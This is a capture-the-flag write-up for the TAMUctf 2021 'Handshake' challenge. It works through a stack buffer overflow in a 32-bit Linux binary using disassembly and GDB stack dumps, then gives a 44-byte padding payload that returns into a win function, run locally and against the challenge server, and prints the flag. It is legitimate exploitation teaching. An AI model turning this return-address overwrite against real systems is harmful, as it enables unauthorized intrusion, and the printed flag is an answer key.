TAMUctf 2021 Handshake Solution
TAMUctf 2021 Handshake - 150 points
Attack this binary and get the flag! handshake
openssl s_client -connect tamuctf.com:443 -servername handshake -quiet
Handshake is a standard i686 Linux binary with NX but no PIE. There’s a stack buffer overflow which is easy enough to exploit. Without PIE, ROP is available. Because Handshake provides a win
function, it makes sense that is the way to get the flag without getting full code execution with a ROP chain.
I used GDB to find the correct offset, besides that I could have just exploited the binary straight without using GDB at all. The problem I had trying to find the right amount of padding was that I couldn’t quite count the stack size. Let’s do it now.
80492cb: PUSH EBP
80492cc: MOV EBP, ESP ; EBP = ESP;
80492ce: PUSH EBX
80492cf: SUB ESP, 0x24 ; ESP -= 0x24;
4 bytes for PUSH EBP. 4 bytes for PUSH EBX. 0x24 bytes for SUB ESP, 0x24. How many is that? 0x2c. So we need 44 bytes of padding. That’s it. That’s the whole thing.
(gdb) run <hs_a.txt
Starting program: /home/angr/handshake <hs_a.txt
Whats the secret handshake?
That isn't correct! You aren't supposed to be here.
Program received signal SIGSEGV, Segmentation fault.
0x0804a020 in ?? ()
...
(gdb) b *0x804931d
Breakpoint 1 at 0x804931d
(gdb) run
Starting program: /home/angr/handshake <hs_a.txt
Whats the secret handshake?
...
Breakpoint 1, 0x0804931d in vuln ()
(gdb) si
0x08049333 in main ()
(gdb) i r esp
esp 0xffffd5a0 0xffffd5a0
(gdb) x/10wx $esp
0xffffd5a0: 0x00000001 0x080490b0 0x00000000 0xf7dc1905
0xffffd5b0: 0x00000001 0xffffd654 0xffffd65c 0xffffd5e4
0xffffd5c0: 0xffffd5f4 0xf7ffdb78
(gdb) x/10wx $esp-4
0xffffd59c: 0x08049333 0x00000001 0x080490b0 0x00000000
0xffffd5ac: 0xf7dc1905 0x00000001 0xffffd654 0xffffd65c
0xffffd5bc: 0xffffd5e4 0xffffd5f4
(gdb) x/10wx $esp-8
0xffffd598: 0xffffd500 0x08049333 0x00000001 0x080490b0
0xffffd5a8: 0x00000000 0xf7dc1905 0x00000001 0xffffd654
0xffffd5b8: 0xffffd65c 0xffffd5e4
(gdb) x/10wx $esp-12
0xffffd594: 0x080491c2 0xffffd500 0x08049333 0x00000001
0xffffd5a4: 0x080490b0 0x00000000 0xf7dc1905 0x00000001
0xffffd5b4: 0xffffd654 0xffffd65c
(gdb) x/10wx $esp-16
0xffffd590: 0x41414141 0x080491c2 0xffffd500 0x08049333
0xffffd5a0: 0x00000001 0x080490b0 0x00000000 0xf7dc1905
0xffffd5b0: 0x00000001 0xffffd654
echo -e 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc2\x91\x04\x08' |./handshake
Whats the secret handshake?
Correct! this is a flag and stuff =]
Segmentation fault
(echo -e 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc2\x91\x04\x08'; cat) |openssl s_client -connect tamuctf.com:443 -servername handshake -quiet
depth=0 CN = hulkcybr1
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = hulkcybr1
verify return:1
Whats the secret handshake?
Correct! gigem{r37urn_c0n7r0l1337}
The flag is gigem{r37urn_c0n7r0l1337}